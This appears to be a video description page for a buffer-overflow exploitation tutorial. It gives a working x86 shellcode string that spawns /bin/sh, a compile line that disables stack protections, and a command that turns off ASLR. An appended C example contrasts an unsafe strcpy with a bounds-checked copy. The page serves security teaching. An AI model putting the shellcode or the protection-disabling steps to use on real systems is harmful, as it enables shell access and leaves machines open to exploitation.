
How to exploit a buffer overflow vulnerability - Practical

297.3K views
Nov 12, 2015
9:44

This tutorial goes over the basic technique of exploiting a buffer overflow vulnerability, with a worked example. It assumes that you already have basic C knowledge, gdb and gcc, and an understanding of how programs represent memory.

The source code for the program can be downloaded at https://drive.google.com/file/d/0B8b0M2LATseXYWRiVHdkaGhwRjg/view?usp=drivesdk&resourcekey=0-ZRMkh5rVq_hvXW6Nb-cb6A

The 46-byte shellcode (x86*) used in this program is:
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"

The compile line is:
gcc -o example -fno-stack-protector -m32 -z execstack example.c

-fno-stack-protector === disables the stack canary that would otherwise be placed after the buffer
-m32 === compiles the program as a 32-bit binary
-z execstack === makes the stack executable

NOTE: If this tutorial is not working, it is likely that you have ASLR enabled. To disable it, run the following command in your terminal:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
When you are finished, I strongly recommend you turn it back on with the command:
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

If you enjoyed this tutorial and want to see more, then please consider buying me a coffee! https://www.buymeacoffee.com/langotto. Definitely not required, but it definitely will be appreciated!

* If your computer uses ARM then this won't work. If you don't know what this means, then as of 2021 it should work unless your computer is a Raspberry Pi, a phone, or an Apple computer released after 2020.
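As an added example (not the tutorial's example.c, which is not on this page), here is the bug class the compile flags above leave unprotected, next to the bounds check that removes it; BUF_SIZE and the sample inputs are constructed for illustration.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64   /* assumed buffer size; the video's example.c may differ */

/* The pattern such tutorials rely on: a fixed-size stack buffer filled with
   strcpy(), which never checks the length of its source. Input longer than
   BUF_SIZE-1 bytes runs past the buffer into the saved frame data after it;
   with -fno-stack-protector nothing detects the overrun before returning. */
void vulnerable_copy(const char *input) {
    char buf[BUF_SIZE];
    strcpy(buf, input);   /* unbounded copy: the bug */
    printf("vulnerable_copy: %s\n", buf);
}

/* Hardened replacement: measure the source without reading past dst_size,
   reject anything that does not fit together with its NUL, then copy.
   Rejecting rather than silently truncating keeps the caller informed. */
bool bounded_copy(char *dst, size_t dst_size, const char *src) {
    size_t len = 0;
    while (len < dst_size && src[len] != '\0')
        len++;
    if (len >= dst_size)      /* no room for the string plus its NUL */
        return false;
    memcpy(dst, src, len + 1);
    return true;
}

/* Same call shape as vulnerable_copy, but reports whether the copy happened. */
bool try_bounded(const char *input) {
    char buf[BUF_SIZE];
    if (!bounded_copy(buf, sizeof buf, input)) {
        fprintf(stderr, "rejected input of %zu bytes (limit %d)\n",
                strlen(input), BUF_SIZE - 1);
        return false;
    }
    printf("try_bounded: %s\n", buf);
    return true;
}

/* Constructed input of 100 'A' bytes, which does not fit in BUF_SIZE. */
static char long_input[101];
const char *make_long_input(void) {
    memset(long_input, 'A', 100);
    long_input[100] = '\0';
    return long_input;
}
```

Calling try_bounded("hello") copies and returns true; try_bounded(make_long_input()) refuses the copy and returns false, leaving the stack frame untouched.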

